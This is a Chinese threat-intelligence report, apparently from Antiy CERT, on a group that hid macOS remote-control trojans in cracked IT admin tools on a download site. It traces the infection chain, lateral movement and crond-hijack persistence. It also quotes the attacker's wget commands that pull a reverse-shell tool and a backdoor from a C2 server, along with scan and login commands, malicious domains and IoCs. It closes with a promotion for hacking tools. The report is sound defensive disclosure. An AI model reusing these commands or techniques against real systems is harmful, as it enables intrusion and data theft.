“暗蚊”黑产团伙通过国内下载站传播Mac远控木马攻击活动分析

黑客&网络安全如何

1 概述

近期，安天CERT发现一组利用非官方软件下载站进行投毒和攻击下游用户案例，并深入分析了攻击者在网管运维工具上捆绑植入macOS平台远控木马，利用国内非官方下载站发布，以此取得政企机构内部关键主机桥头堡，进行横向渗透的攻击活动。

此下载站目前可下载数十个破解软件，其中五款运维工具包含恶意文件，这五款运维工具集中在服务运维工具分类中，安天CERT判断该事件针对的目标为国内IT运维人员。当运维人员寻找macOS平台下免费或破解的运维工具时可能会搜索到该下载站，如果运维人员下载执行了含有恶意文件的运维工具，那么恶意文件会连接攻击者服务器下载并执行远控木马，攻击者可通过此远控木马窃取主机中的数据和文件，确定受害者及所在单位的信息，为后续横向渗透做准备。

安天CERT以攻击者发起的一起实际行动为案例，揭示攻击者横向渗透的手段：攻击者使用远程控制的方式窃取了受害者macOS操作系统主机中的文件；下载并使用fscan、nmap等工具对受害者的内网进行扫描，以获取内网更多服务器和主机的信息；利用口令破解、漏洞利用等渗透手段尝试获取更多服务器和主机的系统权限，横向渗透成功后在服务器上部署并运行hellobot后门。在此次行动中，虽然攻击者的横向渗透水平相对较弱，但是依然成功获取了服务器的系统权限。入侵成功后可能导致数据被窃、信息泄露、被长期监视等安全风险。

安天CERT的分析人员在搜索站搜索“Mac破解软件”等关键字时，该下载站在Google搜索站排名第一，在Bing搜索站排名第七。从该下载站的下载数量来看，含有恶意文件的五款运维工具下载总量已超3万次。安天CERT评估此次攻击活动影响范围较大，且大部分威胁情报平台尚未标记相关的恶意IoC情报，故披露此次攻击活动。建议在该下载站下载过这类运维工具的用户进行自查。

该黑产团伙采用供应链投毒、伪造官方软件网站、以及利用破解软件等多种方式传播恶意程序，主要攻击目标是IT运维人员，攻击范围涵盖了Windows、Linux以及macOS等操作系统。此外，该团伙使用经过精心构造的域名，并对下载的载荷文件进行混淆处理，以规避安全产品的检测，因此安天CERT用“暗蚊”组织命名该团伙。

在即将发布该报告时，安天CERT关联到了近期深信服披露的报告《【高级持续威胁(APT)】谁是“amdc6766”：一年四起供应链投毒事件的幕后黑手》[1]，发现此次事件攻击活动中攻击者可能与友商披露的攻击者为同一批团伙。本次事件中用于传播的工具都是IT运维人员日常使用频次较高的软件工具，两起事件针对的目标重合；在诱饵工具名称和域名的伪装方面思路相似；载荷使用了相同的域名。

2 详细情况

2.1 监测情况

安天CERT监测到“MACYY”下载站上SecureCRT、FinalShell、Navicat等五款运维工具含有恶意文件。如果在macOS操作系统的主机中执行上述工具便会加载恶意文件，连接攻击者C2服务器下载执行远控木马。安天CERT的分析人员在搜索站搜索 “Mac破解软件”等关键字时，该下载站在Google搜索站排名第一，在Bing搜索站排名第七。

图 2‑1 该下载站Google搜索站排名第一

SecureCRT、FinalShell、Navicat、UltraEdit、Microsoft Remote Desktop共五款运维工具被植入恶意文件：

图 2‑2 红框中为此次发现被植入恶意代码的运维工具

从该下载站的下载数量来看，含有恶意文件的五款运维工具下载总量已超3万次。安天CERT评估此次攻击活动影响范围较大，且大部分威胁情报平台尚未标记相关的恶意IoC情报，故披露此次攻击活动。建议在该下载站下载过这类运维工具的用户进行自查，详细自查方法请参考本报告第六小节。

表 2‑1被植入恶意文件的运维工具相关信息

文件名	MD5	被植入恶意文件名	下载量
SecureCRT.dmg	94E0EE6189DF1DAD0EFB01374D67815C	libpng.dylib	6094
ultraedit.dmg	3FF4C5A86CE6A35B6D9A49478BD1058D	libConfigurer64.dylib	6716
Microsoft-Remote-Desktop-Beta-10.8.0(2029)_MacYY.dmg	81F75533298736A23597A34B505209B5	libpng.dylib	1507
FinalShell_MacYY.dmg	808B17A47A91421F50AF04A865DE26C7	libpng.dylib	824
navicat161_premium_cs.dmg	B74301CB51FB165F1ED8F2676A39FBBF	libpng.dylib	16188

当运维人员寻找macOS平台下免费的运维工具时被引流到该下载站，并从中下载执行含有恶意文件的运维工具。恶意文件会连接C2下载远控执行。攻击者在构造恶意域名时，针对不同运维工具采用不同域名且字符串与对应的运维工具文件名相关，从而增加通信隐蔽性。

表 2‑2被植入恶意文件的运维工具文件名和恶意域名

文件名	恶意域名
SecureCRT.dmg	download.securecrt.vip
ultraedit.dmg	download.ultraedit.info
Microsoft-Remote-Desktop-Beta-10.8.0(2029)_MacYY.dmg	download. rdesktophub.com
FinalShell_MacYY.dmg	download.finallshell.cc
navicat161_premium_cs.dmg	download.Macnavicat.com

2.2 攻击活动的时间线

安天CERT分析了此次攻击活动的时间线。攻击者从2023年3月份便着手开始策划此次攻击活动，其最早开始于3月20日注册了其所使用部分的C2域名，在3月至7月期间攻击者陆续注册了此次攻击活动中所涉及的10个C2域名，并在期间攻击者将使用的部分载荷上传至VT测试其免杀效果。最后攻击者在9月19日和20日将被植入恶意文件的五款运维工具上传至该下载站。

图 2‑3 安天CERT还原此次攻击活动时间线

3 攻击流程

被植入恶意文件的破解软件包含IT运维人员常用的SecureCRT、FinalShell、Navicat等五款运维工具。运维工具运行后连接攻击者C2服务器下载远控木马，该远控木马是攻击者基于开源跨平台KhepriC2框架进行修改的远控木马，其主要功能有获取系统信息、进程管理、文件管理、远程Shell等，具备对感染主机进行远程控制的能力。

3.1 初始访问攻击

由于攻击者在这五款运维工具中所采用的攻击方式一样，初始访问攻击以破解版的SecureCRT软件分析为例进行展开。攻击者将恶意文件libpng.dylib添加至破解版的SecureCRT软件中并将其投放至下载站。当用户运行该软件后，软件加载被植入的恶意文件libpng.dylib，连接攻击者搭建的C2服务器下载名为se01.log和bd.log两个加密载荷。libpng.dylib对se01.log文件解密后释放Mac远控木马，该木马是攻击者基于开源跨平台Khepri C2框架进行修改的远控木马，其主要功能有获取系统信息、进程管理、文件管理、远程Shell等，具备对感染主机进行远程控制的能力；libpng.dylib对bd.log文件解密后释放一个名为fseventsd的加载器，该加载器会将自身添加至开机启动项中，以实现持久化。截至安天CERT分析时该加载器用于下载其他载荷的URL已失效且未在公开情报系统中关联到，故无法分析其最终落地载荷。

图 3‑1 破解版的SecureCRT软件攻击流程

3.2 内网横向移动流程

安天CERT以攻击者发起的一起实际行动为案例，揭示攻击者横向渗透的手段：

图 3‑2 攻击者内网横向移动攻击流程

步骤1：远控下载反向Shell工具

在受害者macOS操作系统主机中成功植入Khepri远控木马后，攻击者访问恶意软件服务器下载了一个基于开源跨平台工具goncat进行修改的木马，该木马的主要功能是实现反向Shell连接。攻击者下载goncat木马命令如下：

wget http://159.75.xxx.xxx:443/mac2

步骤2：文件窃取和分析

攻击者利用该木马将受害者macOS操作系统主机中的各类文件上传至匿名文件共享服务托管平台oshi.at上。攻击者基于所收集到的文件进行分析，为进一步的横向移动做准备。

图 3‑3 匿名文件共享服务托管平台oshi.at

步骤3：内网网络扫描

攻击者下载了fscan、nmap等扫描工具，并使用nmap网络扫描工具对开放了22端口的主机进行扫描。此外，攻击者还利用fscan扫描工具对内网进行了扫描，以获取内网更多服务器和主机的信息，包括主机存活信息、端口信息、常见服务信息、Windows网卡信息、Web指纹信息以及域控信息等。使用nmap工具扫描某网段命令如下所示：

nmap -Pn -p22 -oG - 172.xx.xx.xxx/24

步骤4：使用多种渗透手段：

攻击者利用Web漏洞和SSH暴力破解等手段来获取受害者更多的服务器和主机访问权限。使用ssh登陆某服务器命令如下：

ssh xxxxx@172.xx.xx.xxx

步骤5：部署后门进行持久化

攻击者会访问恶意软件服务器下载一个名为centos7的文件，该文件运行后会在当前路径下释放一个名为libdb.so.2的文件，利用libdb.so.2文件对crond服务动态库文件进行劫持，然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间，最后重新启动crond服务，加载执行恶意文件libdb.so.2。经分析发现libdb.so.2文件为hellobot后门，该后门主要功能有文件管理、远程Shell、端口扫描、服务代理等。下载Centos7文件命令如下所示：

wget http://159.75.xxx.xxx:8088/centos7

尽管在此次行动中，攻击者的横向移动整体水平相对较弱，然而并不能忽略其所带来的危害。即使攻击者横向移动能力有限，但仍能通过成功植入恶意软件、利用漏洞和暴力破解等手段，对受害者的系统和数据造成严重的损害。这种攻击形式可能导致敏感信息泄露、系统崩溃、服务中断以及进一步的攻击扩散，对受害者的隐私和安全构成潜在风险。因此，需认真对待这些攻击，并采取适当的安全措施来保护系统和数据免受威胁。

4 关联分析

经关联分析发现，“暗蚊”黑产团伙可能与近期友商披露的报告《【高级持续威胁(APT)】谁是“amdc6766”：一年四起供应链投毒事件的幕后黑手》中的攻击者为同一团伙。发现此次事件攻击活动中攻击者为同一团伙。本次事件中用于传播的工具都是IT运维人员日常使用频次较高的软件工具，两起事件针对的目标重合；在诱饵工具名称和域名的伪装方面思路相似；载荷使用了相同的域名。

本次事件针对IT运维人员，且工具名称和使用的域名相似

攻击者在下载站中上传的破解软件SecureCRT、Ultraedit、Microsoft-Remote-Desktop-Beta、FinalShell、Navicat，都是IT运维人员日常使用频次较高的软件工具，且都被归于该网站的“服务器运维”类别中，表明攻击者有针对性地对IT运维人员进行攻击。

此外，攻击者在本次攻击活动中用于托管恶意载荷的域名，形式上也与攻击者在此前攻击活动中使用的相似。

表 4‑1 攻击者在攻击活动中用于托管恶意载荷的域名

此次攻击活动中用于托管Mac恶意载荷的域名	此前攻击活动中用于托管恶意载荷的域名
download.securecrt.vip	download.oneinstack.club
download.ultraedit.info	download.cnoneinstack.club
download. rdesktophub.com	download.lnmp.life
download.finallshell.cc	download.cnoneinstack.com
download.Macnavicat.com	download.amh.tw

使用crond服务持久化和后门动态链接库手法与友商披露类似。

本次攻击活动中攻击者在内网Linux机器上-访问恶意软件服务器下载一个名为centos7的文件，该文件运行后会在当前路径下释放一个名为libdb.so.2的文件，利用libdb.so.2文件对crond服务动态库文件进行劫持，然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间，最后重新启动crond服务，加载执行恶意文件libdb.so.2。其中使用crond服务持久化和后门动态链接库手法类似。

最终载荷使用的恶意域名net相同

在本次攻击活动中，攻击者在内网Linux机器上使用的最终载荷为hellobot后门，其外联域名为Microsoft.amdc6766.net，与友商分析报告中披露的恶意域名相同。

5 样本详细分析

5.1 破解版SecureCRT软件分析

由于攻击者在这五款运维工具中所采用的攻击方式一样，样本详细分析以破解版的SecureCRT软件分析为例。

表 5‑1破解版SecureCRT软件样本标签

病毒名称	Trojan/MacOS.DarkMozzie[Backdoor]
原始文件名	SecureCRT.dmg
MD5	94E0EE6189DF1DAD0EFB01374D67815C
文件格式	Macintosh Disk Image
文件大小	44.47 MB (46625933 字节)
数字签名	无
加壳类型	无
VT首次上传时间	2023-11-29 07:11:15
VT检测结果	17 / 59

注：可在计算机病毒分类命名百科全书Virusview.net，搜索“DarkMozzie”查看更多该病毒家族相关信息。

SecureCRT是VanDyke Software公司开发的一个商业SSH、Telnet客户端和虚拟终端软件。本次攻击活动破解版SecureCRT软件相较于官网提供的SecureCRT，在Frameworks文件夹中多出一个名为“libpng.dylib”的动态库文件。

图 5‑1 SecureCRT官方版本与破解版本对比

破解版SecureCRT的主Mach-O文件运行时会对该动态库文件libpng.dylib进行加载。

图 5‑2 破解版SecureCRT加载libpng.dylib

5.1.1 libpng.dylib文件分析

libpng.dylib从硬编码的URL处获取下一阶段载荷文件，解码后保存至指定的路径中执行。

图 5‑3 libpng.dylib用于获取下一阶段的载荷文件

对下载的载荷进行解密算法如下所示

图 5‑4 解密算法

5.1.2 解密后的.test文件分析

解密后的.test文件与指定的C2域名进行连接。

图 5‑5 与指定C2域名连接

该木马是攻击者基于开源跨平台KhepriC2框架进行修改的远控木马，其主要功能有获取系统信息、进程管理、文件管理、远程Shell等，具备对感染主机进行远程控制的能力。

图 5‑6 开源平台Khepri远控功能

5.1.3 解密后的.fseventsd文件分析

.fseventsd文件会将自身添加至开机启动项中，以实现持久化。

图 5‑7 将自身添加至开机启动项

.fseventsd文件从硬编码的URL处获取文件，并下载至指定路径中，截至安天CERT分析时该加载器用于下载其他载荷的URL已失效，故无法分析其最终落地载荷。

图 5‑8 下载其他载荷

5.2 内网横向移动使用的样本分析

5.2.1 mac2文件分析

mac2文件是基于开源跨平台工具goncat进行修改的木马，该木马除了支持反弹Shell，同时还支持自删除功能等。安天CERT推测，攻击者在受害者macOS操作系统主机上再次下载一个木马的原因可能是方便执行命令。

图 5‑9 样本调用函数

图 5‑10样本命令行运行截图

5.2.2 centos7文件分析

centos7样本读取自身内容，并根据“ELFELF”找到标记的偏移位置，将该位置后的内容写入当前路径中，并命名为“libdb.so.2”。

图 5‑11释放libdb.so.2文件

利用libdb.so.2文件对crond服务动态库文件进行劫持，然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间，最后重新启动crond服务，以加载执行恶意文件libdb.so.2。

图 5‑12劫持crond服务的动态库文件，并修改时间属性值

libdb.so.2是一个hellobot后门，其解密后的配置信息如下图所示。

图 5‑13该hellobot后门的配置信息

配置信息中每一项配置所对应的功能如下表所示。

表 5‑2配置信息功能

配置项	功能
host	上线地址及端口
group	组名称
install_path	安装后的文件名称
install_path_bak	安装之后备份的文件路径
retry_interval	重连的时间间隔
dns	域名解析使用的DNS
fake_ps	伪装的进程名称
auto_start	是否自启动
note	备注
lock_file	锁文件
plugin_dir	插件目录
mon_interval	监控进程循环执行检测的时间间隔
close_iptable	是否自动清除iptables规则
protocol	通信时使用的协议

该hellobot后门的功能包括如下表所示的内容。

表 5‑3功能列表

功能分类	备注
CManager	对受控设备进行管理
CFileTask	对受控设备中的文件进行管理
CPortMapTask	端口扫描
CShellTask	执行Shell命令
CPluginTask	对插件进行管理
CProxyTask	服务器代理操作

6 安全建议

针对以“暗蚊”为代表的黑产团伙，以IT运营者使用远程访问、编辑器、数据库管理等免费或破解版运维工具作为突破口投放攻击载荷，通过网内横向移动，进一步收集信息并维持持久化，最终窃取主机中的数据和文件的攻击模式，安天CERT建议：

6.1 开展针对性自查

1、对于使用苹果操作系统的IT运营者

（1）确认是否曾在MACYY或其它网站中下载以下运维工具并核对破解软件的MD5：远程访问（SecureCRT、FinalShell 、Microsoft Remote Desktop）、编辑器（UltraEdit）、数据库管理（Navicat Premium）；

图 6‑1确认是否曾下载这些运维工具

（2）检查/tmp/目录中是否存在.test、.fseventsds文件，/Users/Shared/目录中是否存在.fseventsd文件，并检查.fseventsd文件是否被设置为开机启动项。

2、对于使用Linux操作系统的IT运营者

（1）检查/usr/sbin/cron（或crond）文件近期是否被改动；

（2）检查/usr/sbin/cron（或crond）文件所依赖的动态链接库中是否存在libdb.so.2文件；

（3）检查libdb.so.2文件是否存在问题：检查MD5是否为F23ED5D991CF0C8AA8378774E8FA93FE，或者检查libdb.so.2文件的改动时间是否与/usr/sbin/cron（或crond）文件的改动时间相近。

6.2 增强正版软件使用意识

建议IT运营者（尤其是使用苹果操作系统的IT运营者）从官方地址下载常用运维工具，以破解为代表的免费下载站极大可能存在供应链污染，尤其不要相信“苹果操作系统上不会存在病毒”的伪科普。更重要的是，由于IT运营者在使用苹果设备时极大可能不会经常关机，以致“暗蚊”黑产团伙通过远控并持续窃密留下了可乘之机。

6.3 加强主机侧安全防护

建议IT运营者部署企业级终端防御系统，加强针对“暗蚊”黑产团伙在内网横向移动环节的防护。由于当前已知攻击范围已覆盖多个平台，建议已部署Windows、Linux的智甲产品用户启用主动防御功能，并保持病毒库更新到最新。

6.4 提升网络威胁监测与响应

建议IT运营者部署网络威胁检测与响应系统（NTA或NDR）可以结合“暗蚊”相关信标进行告警。

6.5 遭受攻击及时应急处置

IT运营者若在针对性自查或日常工作中发现疑似遭受“暗蚊”黑产团伙的攻击，建议及时隔离被攻击的主机，并保护现场等待安全工程师对主机进行排查。

7 IoCs

IoCs

94E0EE6189DF1DAD0EFB01374D67815C

3FF4C5A86CE6A35B6D9A49478BD1058D

81F75533298736A23597A34B505209B5

735B14D2D9BB4AA848B555AD6F567307

B74301CB51FB165F1ED8F2676A39FBBF

20BA990BE3773C179A4200BC8950463A

4D211EA7D1961B029D30F76FA98C0320

F23ED5D991CF0C8AA8378774E8FA93FE

06158766498ACAC14C70BE52A6C6FDF3

32421A007F28AACF869A46F714945AD0

学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。

（都打包成一块的了，不能一一展开，总共300多集）

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包，需要的话也可以拿走。

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取